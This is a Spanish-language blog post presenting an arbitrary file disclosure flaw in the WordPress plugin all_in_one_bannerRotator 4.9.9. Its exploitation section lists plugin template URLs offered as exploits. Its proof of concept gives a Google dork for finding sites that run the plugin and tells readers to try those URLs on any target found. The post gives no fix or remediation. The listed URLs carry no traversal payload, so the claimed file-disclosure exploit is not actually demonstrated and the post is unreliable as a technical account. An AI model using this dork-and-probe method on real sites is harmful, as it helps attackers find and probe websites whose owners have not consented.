WordPress all_in_one_bannerRotator Plugins 4.9.9 | Exposición de información de archivo

WordPress all_in_one_bannerRotator Plugins 4.9.9



IMPACTO

WordPress all_in_one_bannerRotator Plugins 4.9.9 y otras versiones es propenso a la divulgación de un archivo arbitrario Vulnerabilidad porque no puede desinfectar correctamente la entrada proporcionada por el usuario.

Un atacante puede aprovechar esta vulnerabilidad para ver archivos locales en el contexto del proceso del servidor web, Lo que puede ayudar en el lanzamiento de nuevos ataques.

Una exposición de información es la divulgación intencional o no intencional de información a un actor que no está explícitamente autorizado para tener acceso a esa información. El producto almacena información confidencial en archivos o directorios que son accesibles a actores fuera de la esfera de control pretendida.

El software utiliza una entrada externa para construir una ruta que pretende identificar un archivo o directorio que se encuentra debajo de un directorio padre restringido, pero el software no lo hace neutralice adecuadamente los elementos especiales dentro de la ruta que pueden causar la ruta para resolver en una ubicación que está fuera del directorio restringido.

EXPLOTACION

Para la expotacion de la vulnerabilidad utilizaremos a modo de exploits las siguientes URL:
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/add_banner.php?page=all_in_one_bannerRotator_Manage_Banners
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/banners.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/help.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Add_New
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Manage_Banners
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/overview.php?page=all_in_one_bannerRotator_Help
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/add_playlist_record.php?page=all_in_one_bannerRotator_Playlist
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/playlist_elements_over_image.php
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/preview.html
  • /wp-content/plugins/all_in_one_bannerRotator/tpl/settings_form.php 
Solo se debe sustituir la URL.

POC

Para identificar un sitio vulnerable, que utilice el CMS de WordPress con el plugin "all_in_one_bannerRotator, utilizamos una busqueda avanzada en Google por medio de un dork.

[🔎] inurl:"/wp-content/plugins/all_in_one_bannerRotator/"


La identificacion de objetivos posiblemente vulnerables

Una vez identificado algún sitio objetivo, solo debemos de probar los exploits anteriores.




Discovered By KingSkrupellos

Publicar un comentario

0 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?